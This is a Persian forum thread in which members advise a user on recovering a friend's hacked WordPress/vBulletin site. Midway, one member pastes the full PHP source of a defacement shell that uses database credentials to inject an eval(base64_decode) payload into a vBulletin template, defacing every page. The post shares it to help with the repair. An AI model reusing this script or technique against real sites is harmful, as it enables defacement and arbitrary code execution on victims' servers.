سلام دوستان امروز وقتی میخواستم وارد سایت دوستم بشم متوجه شدم که
هک شدند توسط سعودی ها. میگن هر چه صفحه اول رو تغییر میدند تغییر پیدا نمیکنه
و در سرورشون یک شل اپلود کردند و دست بردار نیستند.
آیا از دوستان شخصی هست که بتونه کمک کنه و این دوستمون رو نجات بده.

ايران ميكرو (http://www.iranmicro.ir)

یکی از انجمن های خوب برق الکترونیکی هست.

دوست عزیز سیستمت چیه ؟

سیستمشون ورد پرس هست و واقعا سایت مفیدی هست من که شخصا خیلی استفاده کردم مخصوصا از مجلات میکرو شون ! هر کمکی هم بخاین در خدمتم !

سلام دوستان امروز وقتی میخواستم وارد سایت دوستم بشم متوجه شدم که
هک شدند توسط سعودی ها. میگن هر چه صفحه اول رو تغییر میدند تغییر پیدا نمیکنه
و در سرورشون یک شل اپلود کردند و دست بردار نیستند.
آیا از دوستان شخصی هست که بتونه کمک کنه و این دوستمون رو نجات بده.

ايران ميكرو (http://www.iranmicro.ir)

یکی از انجمن های خوب برق الکترونیکی هست.

سلام

اگر سرور شخصی هست باید سرور رو داون کنن، شروع کنن با ls -a کل فولدرهای سایتشون رو بگردن... (شل غیر از فولدر آپاچی جای دیگه اجرا نمیشه، اگر مطمئنن اونجا چیزی نیست و هنوز مشکل دارن، لینوکس بک دور داره...
اگر سرور عمومی (هاست اشتراکی) هست، وظیفه مسئول سرور هست که در کوتاهترین زمان ممکن همین کار رو خودش انجام بده و سرور رو برگردونه...
دلیل تاکید غیر عقلانی! ما مدیران امنیت بر بک آپ گیری دائمی همین هست که اگر یه چنین اتفاقی افتاد بگه به درک که هک کردن (به ....) دو سوت بک آپ رو بر میگردونم، همه چیز درست میشه... کسی که بلد نباشه بک آپ بگیری حقشه که گیر کنه و نتونه سایتشو برگردونه! (ایشالا که مشکل ایشون با همین راهی که گفتم حل میشه)
ضمنا، پاک کردن اسکریپت یا شل یا بک دور یا تروجان یا بمباردیر به تنهایی هیچ خاصیتی نداره، همونطور که یک بار هک کردن، بار بعد هم میکنن... باید با بررسی لاگ فایل ها مشکل رو پیدا کنید (معمولا به یک فرد خبره در امنیت هم نیاز دارید) و سرور رو ایمن کنید تا دوباره به همونجایی که بودید برتون نگردونن (دوباره هک نشید)

آقا با صحبتی که با مدیر این سایت داشتم ( از دوستا خوب بنده هستند و هر چند رقیب ) کلیه مشخصات ورود و ... رو لطف کردند و امید ما دو دوست
به دوستان وبهاستینگ تالکی هست.
حالا من چه کار باید بکنم , مشخصات بدم ؟ اطلاعات و ... چی تقدیم کنم.

کنترل پنل CPanel هست.

---------- Post added at 11:27 AM ---------- Previous post was at 11:26 AM ----------

بعد از خدا چشم به کمک شما دوستان داریم.

نمایندگی هاست دارن البته خودشون مستقیم از خارج گرفتن.

srashedian جان
میتونم اطلاعات سرور رو خدمتتون تقدیم کنم جهت بررسی؟ :-*:">
البته میدونم که ممکنه کار داشته باشید و سرتون شلوغ باشه اما با دیدن چندین مقاله امنیتی در یکی از این تاپیک ها به کارتون اعتماد دارم.
البته به سایر دوستان هم اعتماد هست ولی بحث آشپز و ... هست.

---------- Post added at 11:34 AM ---------- Previous post was at 11:32 AM ----------


نه عزیز انشالا زودتر درست بشه..اگر کمکی هم از طرف بنده هست در خدمتیم.. حرفهایی بود که باید گفته میشد برای بعضی ها...موفق باشید..

دوستان هر کسی میتونه زودتر کمک کنه به این دوستمون..

دکمه تشکر نیست که دکمه رو بزنم اما در پستی از الان از تکتک دوستان کمک میخوام و از این تاپیک ازشون پیشاپیش تشکر میکنم.

:x:71:=D> چی شد چی شد وردپرس هک شد؟؟؟؟؟؟؟=)) وردپرس هک بشو نبود که.. ماشالا قدرت برتر بود.عزیز ما بود...چطور امکان داره هک بشه؟ نه عزیز اشتباه نکن فقط نیوک هک میشه وردپرس جرعت هک شدن نداره..صد در دویست درصد ایراد از سرور شما بوده وگرنه وردپرس هک بشو نیست برادر..=))

الان وقت این حرفها نیست من خودم سایت الکترونیک دارم سایت برق الکترونیک ایرانیان Ω الكترونيكا (http://www.electronica.ir) یکبار یک مشکل پیش آمد داشتم قاطی می کردم حالا چه برسه هک
من همیشه بک آپ می گیرم به نظر من بهترین کار اینه که به سرورتون بگید که سایتتونو بر گردونن به بک آپ چند هفته پیش که Shell توش نیست...
نسخه نیوک هم Sehll راحت روش سوار می شد اموزششم هم دادیم تو نیوک کارم می کرد ولی آپدیت پچ دادیم درست شد ...
وردپرس ولی مدیرش خیلی کری می خوند...

wp بوده یا انجمن ؟

اگر ویبولتین بوده که این روش هک کردن تنها راه چارش بکاپ هست چون sql سایت رو توسط شلی دستکاری میکنن که همه صفحه ها دیفیس میشه

wp بوده یا انجمن ؟

اگر ویبولتین بوده که این روش هک کردن تنها راه چارش بکاپ هست چون sql سایت رو توسط شلی دستکاری میکنن که همه صفحه ها دیفیس میشه
دوست من داره می گه wp پورتال بوده دیگه البته وبلاگ بیشتر وردپرس تا یک پرتال

srashedian جان
میتونم اطلاعات سرور رو خدمتتون تقدیم کنم جهت بررسی؟ :-*:">
البته میدونم که ممکنه کار داشته باشید و سرتون شلوغ باشه اما با دیدن چندین مقاله امنیتی در یکی از این تاپیک ها به کارتون اعتماد دارم.
البته به سایر دوستان هم اعتماد هست ولی بحث آشپز و ... هست.

---------- Post added at 11:34 AM ---------- Previous post was at 11:32 AM ----------



دکمه تشکر نیست که دکمه رو بزنم اما در پستی از الان از تکتک دوستان کمک میخوام و از این تاپیک ازشون پیشاپیش تشکر میکنم.

مشخصات رو بفرستید و مشکل رو هم کامل شرح بدین

سرور هم که justhost.com هست و خوراکه هکرای عرب ، چون بیشترشون ایرانیه

ویبولتین سیستم انجمن و wp سیستم صفحه اول هست.

ویبولتین سیستم انجمن و wp سیستم صفحه اول هست.


اگر کمک خواستید در خدمتم ، البته دوستان زودتر لطف کردند

ویبولتین سیستم انجمن و wp سیستم صفحه اول هست.

وی بی رو هم زدن ؟

مشخصات رو بفرستید و مشکل رو هم کامل شرح بدین

لطفا پ.خ رو چک کنید.

---------- Post added at 12:00 PM ---------- Previous post was at 11:59 AM ----------


وی بی رو هم زدن ؟

سلام mr.bahram .
ظاهرا دیروز مشکل از اون ناحیه شناسایی شده. :(

Vb انقدر می گیم باگ باگ داره بازم گول ظاهرو می خورید ....امکاناتش عالی ولی باگ داره باید خیلی روش کار بشه

---------- Post added at 12:21 PM ---------- Previous post was at 12:02 PM ----------


سرور هم که justhost.com هست و خوراکه هکرای عرب ، چون بیشترشون ایرانیهپس چی می گنم از هر لحاظ 2 امینه؟
شرکت جاست هاست امریکا یکی از بزرگترین و برترین شرکت های میزبانی وب در دنیا می باشد.
برای کاربران با تجربه ، جاست هاست امریکا نیاز به معرفی ندارد ولیکن جهت خالی نبودن عریضه به ذکر چند مورد از رتبه بندی های جهانی سرویس های هاستینگ دنیا و رتبه جاست هاست در آنها می پردازیم:


1- سایت Home (http://www.webhosting-comparisons.info)
جاست هاست امریکا در سایت مذکور دارای رتبه اول یا همان رنک 1 در بین تمامی هاستینگ های سراسر دنیا بوده و بهترین معرفی شده است:
لینک تایید صحت مطلب (http://www.webhosting-comparisons.info/justhost.html?OVRAW=justhost&OVKEY=justhost&OVMTC=standard&OVADID=62184924511&OVKWID=357622699011&OVCAMPGID=13579765511&OVADGRPID=22654546899&OVNDID=ND2)

2- سایت Web Hosting Reviews, Top 10 Web Hosts | Best Web Hosting 2010 (http://www.alreadyhosting.com)
جاست هاست در سایت مذکور باز هم رتبه نخست را به خود اختصاص داده است.
لینک تایید صحت مطلب

(http://www.alreadyhosting.com/blog/2009/06/why-is-justhost-com-ranking-1-on-multiple-hosting-review-sites/)3- سایت Web Hosting Review 2010 - TopTenREVIEWS (http://www.web-hosting-review.toptenreviews.com)
جاست هاست در صفحه نخست این سایت هم به عنوان برترین سرویس میزبانی وب در دنیا شناخته شده است :
لینک تایید صحت مطلب

(http://web-hosting-review.toptenreviews.com/)4- سایت TOP 10 WEB HOSTING COMPANIES 2010 - The Best hosting company review site, with exclusive coupons. (http://www.webhostingmadness.com)
در صفحه اول این سایت باز هم جاست هاست رتبه نخست را به خود اختصاص داده است :
لینک تایید صحت مطلب

(http://www.webhostingmadness.com/)5- سایت www.webhostingstuff.com (http://www.webhostingstuff.com)
در این سایت جاست هاست دومین هاست برتر جهان معرفی شده است:
لینک تایید صحت مطلب
(http://www.webhostingstuff.com/)


(http://www.webhostingstuff.com/)

سلام دوستان
با تماسی که داشتم میگن هرچه قدر که میخوان ایندکس یا صفحه اول رو تغییر بدن نمیشه و خود جاست هاست هم میگن توش مونده که از کجا دارن نفوذ میکنن. واقعا براشون ناراحتم. میشه زودتر این قضیه رو تموم کرد؟

یک بک آپ سریع بگیر از دیتابیس و فایلهات البته اگر سنگین آنچنانی نیست. بعد کل فایلهاتو بزن پاک کن. ببین بازم میتونن بیان؟ مال من رو قبلا اینطوری شده بود رو سرور شل داشتند. میگفتم از سرور هست باور نمیکردند.یک بک آپ گرفتم کلی از دیتابیس و فایلهام و زدم همه چیز رو پاک کردم. دیدم بازم آمدند فهمیدند از سرور هست.. الانم اگر واقعا کاری دیگر نمیتونی کنی همین کاری رو که گفتم رو انجام بده. یک بک آپ کلی از کل فایل و دیتابیست بگیر.اگر سنگینه رو یک سرور دیگر مستقیم بک آپ بگیر و اینو بزن پاک کن.. البته نمیدونم همین یک سایت رو داری و سبک هست سایتت یا نه سنگینه و امکان این کار نیست.

این شلی هست که تمام صفحات vb رو def میکنه و تنها راهش ریستور کردن بکاپ از دیتابیس هست

کدشو میزارم تا برنامه نویس های سایت شاید تونستند تشخیص بدن کجای دیتابیس را باید ترمیم کرد


<?php
/*
|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|. |.|
|.|############################################### ####|.|
|.|# #|.|
|.|# <==-|KhDaChE-511|-==> - <==-|C9k@HoTmAiL.Fr-==> #|.|
|.|# #|.|
|.|############################################### ####|.|
|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|. |.|
*/

?>
<html><style>
input, select, textarea {
background-color: #000000;
border-style: #7a7c7d;
border-width: 1px;
font-family: verdana, arial, sans-serif;
font-size: 11px;
color: #7a7c7d;
padding: 0px;
}
A:link {
COLOR:#A2A2A2; TEXT-DECORATION: none
}
A:visited {
COLOR:#A2A2A2; TEXT-DECORATION: none
}
A:active {
COLOR:#787878; TEXT-DECORATION: none
}
A:hover {
color:#8C8C8C;TEXT-DECORATION: none
}
</style>
<head>
<title>ÊÛííÑ ÌãíÚ ÕÝÍÂ‘Ê ÇáãõÜäÊÜÜÏì ^_^</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor="black" text="#7a7c7d">
<div align="center">
<H2><u>KhDaChE-<strong>5</strong>11</u></H2>
|<a href="mailto:C9k@HoTmaiL.Fr">C9k(AT)HoTmaiL(DoT)Fr</a>| | <a href=""> |511| </a> |<br>
<u>Change All pages For Forum</u>
<br><br>
<?

if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
<INPUT value=\"Set\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());

$index=str_replace("\'","'",$index);

$set_index = "{\${eval(base64_decode(\'";

$set_index .= base64_encode("echo \"$index\";");


$set_index .= "\'))}}{\${exit()}}</textarea>";

$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());

if($ok){
echo "!! update finish !!<br><br>";
}

}
# Footer
echo "<strong>KhDaChE-511 :</strong> <u> |511| </u>";
?>

سایت بنده نیست.
به توجه به اینکه رسیلر هستند و چند تا سایت دیگه روش هاست شده فکر نکنم قبول کنن.
به هر حال ممنون از کمکتون.

مشكل هنوز حل نشده ؟
براي تست اينكه از روي يك شل روي همون اكانت دارند ميزنند نياز نيست كل فايل ها رو پاك كنيد و دوباره آپ كنيد،كافيه با htaccess يا سي پنل دسترسي به تمام فايل رو ببنديد.
معولا يا فايل index رو تغيير مي دند يا فايل config ، بهر حال دسترسي به فايل ها رو محدود كنيد و دنبال فايل ها مخرب بگيرديد ، مادامي كه دنبال اين فايل ها مي گرديد اگر باز هم هك كردند كه خوب مشخصه وقتي دسترسي به شلي يا چيزي روي اون اكانت نداشتند پس دارند يا از روي اكانت ديگه ميزنند يا از روي سرور !
اگر مشكل حل نشده مشخصات رو دوست داشتيد پ.خ كنيد...قبلا روي يكي از هاستينگ هاي ايراني تجربه ي مشابهي رو داشتم ! البته اون دفعه سرور رو مي زدن...
@ParsHost : اين كدي كه گذاشتين هيچ باگي نيست ! وقتي اين اسكريپت كارايي داره كه طرف نام كاربري ، رمز عبور ديتابيس و نام ديتابيس رو داشته باشه كه اگه اين 3 مورد رو با هم كسي داشته باشه هر سيستمي رو تقريبا مي تونه هك كنه ! به خصوص اگر remote access هم فعال باشه كه معمولا هست و ديگه نياز به آپلود كردنش رو سرور طرف هم نيست ...

@ParsHost : اين كدي كه گذاشتين هيچ باگي نيست ! وقتي اين اسكريپت كارايي داره كه طرف نام كاربري ، رمز عبور ديتابيس و نام ديتابيس رو داشته باشه كه اگه اين 3 مورد رو با هم كسي داشته باشه هر سيستمي رو تقريبا مي تونه هك كنه ! به خصوص اگر remote access هم فعال باشه كه معمولا هست و ديگه نياز به آپلود كردنش رو سرور طرف هم نيست ...

بله دوست عزیز این باگ نیست ، منم گفتم دیتابیس رو تغییر دادند و مسلم هست که شل روی سایت این عزیز آپلود نشده
دسترسی local دارند (سرور) و با خواندن فایل config با استفاده از این شل سایت رو دیفیس کردند

دیتابیس رو برگردونید و فایل config را کد کنید ، چون اگر بخوان دوباره میتونن بزنن !

@ hello عزیز: پ.خ شد
______________
@ ParsHost عزیز : تماس گرفتند؟

______________
@ ParsHost عزیز : تماس گرفتند؟

بله ، توضیح دادم بهشون

الان فقط صفحه ایندکس ویبولتن نمی یاد دیگه درسته ؟
بقیه صفحه های ویبولتن بدون مشکل کار می کنه ؟

اگه اینجوره یک فایل index.htm آپلود کنید تا مشکل موقت حل بشه . توی این صفحه هم به آخرین ارسال ها لینک بدید
نیازی هم به ریستور تمام تیبل های دیتابیس نبست
اگه مشکلتون با فایلی که گفتم آپلود کنید حل شد بگید تا بگم کدوم تیل ها را ریستور کنید

با سلام ،

دوست عزیز با توضیحاتی که دادید هک سایت دوست شما از طریق Sql Injection انجام شده ، اگر می خواهید جلو گیری کنید باید مشکل را درون دیتابیس جست و جو کنید و سپس قسمتی و Table ای که روی آن Sql Injection رخ داده را در کدهای PHP ترمیم کنید چون در غیر این صورت با Restore کردن مجدد باز هم هک خواهید شد .

موفق باشید .

سلام . اطلاعاتتون رو پ .خ کنید تا مشکلتون رو برطرف کنم
اگر از طریق sql injection هک شده باشید که از طریق دیتابیس پاسورد رو میشه برگردوند و اگر از طریق rfiو... که به نحوی شل آپلود شده باشه باز میشه از طریق فایل ها مشکل رو برطرف کرد . خواستید اطلاعات بفرستید تا مشکل رو برطرف کنم

با تشکر از کلیه دوستان همانطور که عرض کردم سایت دوستم هست و ایشون گفتند که مدیران سرور جاست هاست خودشون مسئولیت رو قبول کردند.
امیدوارم مشکلشون حل بشه.

از تک تک دوستان تشکر ویژه میکنم و امیدوارم که هر جا هستند موفق باشند.